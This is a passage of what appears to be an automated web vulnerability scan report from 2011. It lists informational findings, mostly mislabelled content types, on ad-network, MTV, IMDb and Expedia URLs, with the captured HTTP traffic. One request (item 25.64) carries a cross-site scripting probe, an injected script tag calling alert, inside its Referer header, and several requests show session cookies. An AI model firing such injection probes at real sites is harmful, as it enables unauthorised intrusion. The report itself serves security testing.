...[SNIP]...

25.49. http://w55c.net/ct/cms-2-frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://w55c.net
Path:	/ct/cms-2-frame.html

Request

GET /ct/cms-2-frame.html?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: w55c.net
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Expires: Mon, 13 Jun 2011 12:03:16 GMT
Vary: Accept-Encoding
Last-Modified: Fri, 22 Apr 2011 22:48:50 GMT
ETag: "1548528128"
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 3621
Connection: close
Date: Mon, 13 Jun 2011 11:03:16 GMT
Server: w55c.net

<html>
<head>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif',
   pixels=[],
   matchersConfig=[

...[SNIP]...

25.50. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/

Request

Response

25.51. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/loadingImage.asp

Request

Response

25.52. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/psf/PsfGridActivities.asp

Request

Response

25.53. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

Request

Response

25.54. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

Request

Response

25.55. http://www.hbo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hbo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.hbo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_ria%3Dflash%252010%257C%3B%20s_sq%3D%3B; s_vi=[CS]v1|26FAF90E051D1131-6000013800042F55[CE]

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:25:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
g: u
Content-Length: 3130
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>HBO: 404 Page Not Found</title>
<script language="JavaScript" src="/scri
...[SNIP]...

25.56. http://www.imdb.com/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html

Request

GET /images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0944947/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYoMm5Fdk_phrDOi8Rq3lr0Vfkpyn_iZKlvUBXpjayFtDxQnvLUGHaI23s7AlzX-TK4cn0Z1dit92ljBzqFG5RN_fCvXzjD_K5kMcFKrMEtBsTZ60YEwroC8LIhmUNCMVa63L1rgk2rPactgSSRuYyd2sNlQetwFKDdqwvr4HFJbYxUap5z-sbkpssAp3mTxfp-3MNnFWWlXV5xO57bZcUuRlJB7H8yKBVciBLIF59N9KU0zx4NQoloE7ko_sR4L4WQXXQHOXfWcviAwTNg4TMaJxYtW1mTsFTet-OFjVnNG-OjPKdy96Tic0OnaeSI-wRmMw8DkpM51sjBe23mmsXM9g; cs=hNXsN7ESKPmtup0EZ0F8ngeBbbqgkVqM8BkNuqOCHTKzAg6JM4JeudCRXRoA0U26oKcq7CMBbbqj50iJ99HN2bCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==; session-id=431-7963916-4788795; session-id-time=1465643916

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:49 GMT
Server: Server
Last-Modified: Sun, 12 Jun 2011 05:36:18 GMT
ETag: "9b4-2e973880"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Thu, 10 Jun 2021 11:23:49 GMT
nnCoection: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 2484

<html>
<head>
<!--
Version: 2.0
Purpose: this page helps to load a sequence of javascript and swf files
for use by a parent document.
Dependencies:
1) must be loaded from an iframe, with the same
...[SNIP]...

25.57. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

Request

GET /images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0944947/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYoMm5Fdk_phrDOi8Rq3lr0Vfkpyn_iZKlvUBXpjayFtDxQnvLUGHaI23s7AlzX-TK4cn0Z1dit92ljBzqFG5RN_fCvXzjD_K5kMcFKrMEtBsTZ60YEwroC8LIhmUNCMVa63L1rgk2rPactgSSRuYyd2sNlQetwFKDdqwvr4HFJbYxUap5z-sbkpssAp3mTxfp-3MNnFWWlXV5xO57bZcUuRlJB7H8yKBVciBLIF59N9KU0zx4NQoloE7ko_sR4L4WQXXQHOXfWcviAwTNg4TMaJxYtW1mTsFTet-OFjVnNG-OjPKdy96Tic0OnaeSI-wRmMw8DkpM51sjBe23mmsXM9g; cs=hNXsN7ESKPmtup0EZ0F8ngeBbbqgkVqM8BkNuqOCHTKzAg6JM4JeudCRXRoA0U26oKcq7CMBbbqj50iJ99HN2bCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==; session-id=431-7963916-4788795; session-id-time=1465643916

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:18:44 GMT
Server: Server
Last-Modified: Sun, 12 Jun 2011 05:36:17 GMT
ETag: "b6-4a57d2e87f640"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Thu, 10 Jun 2021 11:18:44 GMT
Cneonction: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 182

<html><head>
<style>body{ background:transparent; }</style>
</head><body>
<script type="text/javascript">parent.ad_utils.render_ad(document, window);</script>
</body></html>

25.58. http://www.imdb.com/images/a/ifb/google_afc_labs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/images/a/ifb/google_afc_labs.html

Request

Response

25.59. http://www.imdb.com/images/a/ifb/pda_comm2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/images/a/ifb/pda_comm2.html

Request

Response

25.60. http://www.imdb.com/title/tt0944947/_ajax/footer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/title/tt0944947/_ajax/footer

Request

Response

25.61. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mtv.com
Path:	/global/music/modules/followUs/js/index.jhtml

Request

Response

25.62. http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mtv.com
Path:	/global/music/modules/rssPartner/js/index.jhtml

Request

GET /global/music/modules/rssPartner/js/index.jhtml?rssModuleConfig=/content/rssPartner/blogs/mtvmoviesblog.jhtml HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1307963945|session#1307963884869-321358#1307965745

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: cfbf426cbbb1dbc2ebd17941f8c5e8d1
Last-Modified: Mon, 13 Jun 2011 11:22:44 GMT
Content-Type: text/html
Content-Length: 9951
Cache-Control: max-age=273
Date: Mon, 13 Jun 2011 11:22:44 GMT
Connection: close
Vary: Accept-Encoding

var documentBuffer = "<div class=\"mdl mL10p\"> <div class=\"h-wrap group\"> <h2 class=\"h-sub2 group\"> <span>Sites We Like</span> </h2> </div> <ol class=\"lst rssPartner\"> <li> <div class=\"title2\
...[SNIP]...

25.63. http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mtv.com
Path:	/sitewide/modules/footer/brandFooter/js/index.jhtml

Request

GET /sitewide/modules/footer/brandFooter/js/index.jhtml HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1307963945|session#1307963884869-321358#1307965745

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: ff3a37a3547cc6757a36bb697dae537
Last-Modified: Mon, 13 Jun 2011 10:54:09 GMT
Content-Type: text/html
Content-Length: 4078
Cache-Control: max-age=313
Date: Mon, 13 Jun 2011 11:18:09 GMT
Connection: close
Vary: Accept-Encoding

var documentBuffer = "<div class=\"gft-row\" id=\"gft-brand\"> <div class=\"gft-row-subrow\"> <ul class=\"gft-col\"> <li class=\"gft-col-header\">MTV BLOGS</li> <li> <a href=\"http://labsblog.mtv.com/
...[SNIP]...

25.64. http://www.mtv.com/sitewide/modules/footer/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mtv.com
Path:	/sitewide/modules/footer/js/index.jhtml

Request

GET /sitewide/modules/footer/js/index.jhtml?external=true HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; __cs_rr=1; s_nr=1307963913916; s_cc=true; s_sq=%5B%5BB%5D%5D; s_ppv=27; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1307963884869-321358#1307966717|check#true#1307964917

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 8235692134dfcb4728c65fb48e794e
Last-Modified: Mon, 13 Jun 2011 11:04:33 GMT
Content-Type: text/html
Content-Length: 6201
Cache-Control: max-age=1
Date: Mon, 13 Jun 2011 11:34:19 GMT
Connection: close
Vary: Accept-Encoding

var documentBuffer = "<div class=\"noindex\" id=\"gft\"> <div class=\"gft-row\" id=\"gft-search\"> <a href=\"http://www.mtv.com/\" id=\"gft-search-logo\"> <span class=\"mtv-logo\">MTV Logo: </span> </
...[SNIP]...

25.65. http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mtv.com
Path:	/sitewide/modules/header/mtv/js/index.jhtml

Request

GET /sitewide/modules/header/mtv/js/index.jhtml?external=true HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1307963945|session#1307963884869-321358#1307965745

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 5031ea6b8f2f8688697c62ffcce2f1f
Last-Modified: Mon, 13 Jun 2011 11:01:56 GMT
Content-Type: text/html
Content-Length: 21384
Cache-Control: max-age=531
Date: Mon, 13 Jun 2011 11:22:46 GMT
Connection: close
Vary: Accept-Encoding

var documentBuffer = "<div id=\"header\"> <hr/> <div class=\"navWrap\"> <div id=\"nav\" class=\"noindex globalNav\"> <div id=\"memberbar\"> <div class=\"memberbarlinks\"> <a href=\"http://www.mtv.com\
...[SNIP]...

25.66. http://www.nba.com/mavericks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/mavericks/

Request

GET /mavericks/ HTTP/1.1
Host: www.nba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; adDEon=true

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 208
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=60
Date: Mon, 13 Jun 2011 11:01:19 GMT
Connection: close

<html>
<head>

<META HTTP-EQUIV="refresh" content="0;URL=/mavericks/playoffs/2011_nba_finals_champions.html">

<title>NBA.com</title>
</head>
<body onLoad="onLoad();">
</body>
<
...[SNIP]...

25.67. http://www.nba.com/video/cvp/teamarticleplayer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nba.com
Path:	/video/cvp/teamarticleplayer.html

Request

Response

25.68. http://www.oneregion.com/app/calendar/events/js/calWidget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oneregion.com
Path:	/app/calendar/events/js/calWidget.php

Request

GET /app/calendar/events/js/calWidget.php?random=18,23,27,25,38,30,40 HTTP/1.1
Host: www.oneregion.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: max-age=600
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:19:58 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
Expires: Mon, 13 Jun 2011 11:29:58 GMT
X-PHP-Engine: enabled
Real-Hostname: oneregion.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 9816

try { document.write('<div id=\"blox-calendar-widget\"><ul class=\"calendar-widget-nav inline-list\"><li class=\"first\"><a href=\"#calwidget-1\" onclick=\"javascript:void(0); return false;\" class=\"
...[SNIP]...

25.69. http://www.paperg.com/jsfb/embed.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Request

Response

25.70. http://www.ugo.com/takeover/takeover.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ugo.com
Path:	/takeover/takeover.html

Request

Response

25.71. http://www.ugo.com/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ugo.com
Path:	/xd_receiver.htm

Request

Response

26. Content type incorrectly stated previous next
There are 65 instances of this issue:

http://ad.doubleclick.net/pfadx/fansided_cim/
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**
http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_30%20years.jpg
http://admeld.lucidmedia.com/clicksense/admeld/match
http://adserv.impactengine.com/www/e9/07/w2/1y/objembed.html/@@1307040897@@
http://adserver.veruta.com/cookiematch.fcgi
http://amch.questionmarket.com/adscgen/st.php
http://api.mixpanel.com/track/
http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json
http://api.twitter.com/1/fansided/lists/fansided-nba/statuses.json
http://api.uproxx.com/ulink/template.js
http://ar.voicefive.com/b/rc.pli
http://as.jivox.com/player/jivox_ad_tags.php
http://as.jivox.com/unit/jivox_unit_tags.php
http://beacon.videoegg.com/btf
http://beacon.videoegg.com/initjs
http://beacon.videoegg.com/invpos
http://bes-clck.com/v
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cdn.apture.com/media/searchfilter.khtml.v33513556.js
http://cdn.triggertag.gorillanation.com/js/4600_US.php
http://cdn2.sbnation.com/profile_images/435869/a7d63d06_small.jpg
http://cm.npc-lee.overture.com/partner/css/ads.css
http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php
http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php
http://event.adxpose.com/event.flow
http://expedia-www.baynote.net/baynote/tags3/common
http://hollywoodcrush.mtv.com/wp-content/themes/charlie_default/community/flux.inc
http://kotaku.com/
http://l.apture.com/v3/
http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg
http://mediacdn.disqus.com/1307735099/fonts/disqus-webfont.woff
http://moviesblog.mtv.com/wp-content/themes/charlie_default/community/flux.inc
http://my.yahoo.com/e/df
http://my.yahoo.com/e/js
http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2
http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f
http://platform.twitter.com/widgets.js
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://spd.pointroll.com/PointRoll/Ads/PRScript.dll
http://thesouthern.com/app/port/bulkCommentCount.php
http://thesouthern.com/app/port/tabMostCommentedJs.php
http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/
http://www.buzzfeed.com/favicon.ico
http://www.expedia.com/daily/js/flash.vbs
http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp
http://www.facebook.com/extern/login_status.php
http://www.lijit.com/wijit
http://www.mavgear.com/favicon.ico
http://www.mtv.com/global/music/modules/followUs/js/index.jhtml
http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml
http://www.mtv.com/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg
http://www.mtv.com/sitewide/css/charlie/themes/blogs/mtvmoviesblog/bg-tile_1200.gif
http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml
http://www.mtv.com/sitewide/modules/footer/js/index.jhtml
http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml
http://www.oneregion.com/app/calendar/events/js/calWidget.php
http://www.paperg.com/jsfb/embed.php
http://www.reddit.com/static/spreddit4.gif
http://www.stumbleupon.com/hostedbadge.php
http://www2.sesamestats.com/paneltracking.aspx
http://www24a.glam.com/appdir/resources/rendergadget.js

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://ad.doubleclick.net/pfadx/fansided_cim/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/pfadx/fansided_cim/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

26.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.5. http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_30%20years.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://admedia.wsod.com
Path:	/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_30%20years.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_30%20years.jpg HTTP/1.1
Host: admedia.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:10:59 GMT
Server: PWS/1.7.2.3
X-Px: ht iad-agg-n29.panthercdn.com
Cache-Control: max-age=259200
Expires: Thu, 16 Jun 2011 01:57:14 GMT
Age: 33225
Content-Length: 4093
Content-Type: image/jpeg
Last-Modified: Tue, 31 Aug 2010 18:28:15 GMT
Connection: keep-alive

.PNG
.
...IHDR.......!......qs.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..\ T.W......m.MP..#...h4b.-....,h..DM4N":.8.&1...2Y\2..1(.qE1...DEEq..@..d....V?.....".2.S.._..RU..}.._../y`...7...G..
...[SNIP]...

26.6. http://admeld.lucidmedia.com/clicksense/admeld/match previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:15 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 164
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3460050161923843111"/>');

26.7. http://adserv.impactengine.com/www/e9/07/w2/1y/objembed.html/@@1307040897@@ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://adserv.impactengine.com
Path:	/www/e9/07/w2/1y/objembed.html/@@1307040897@@

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

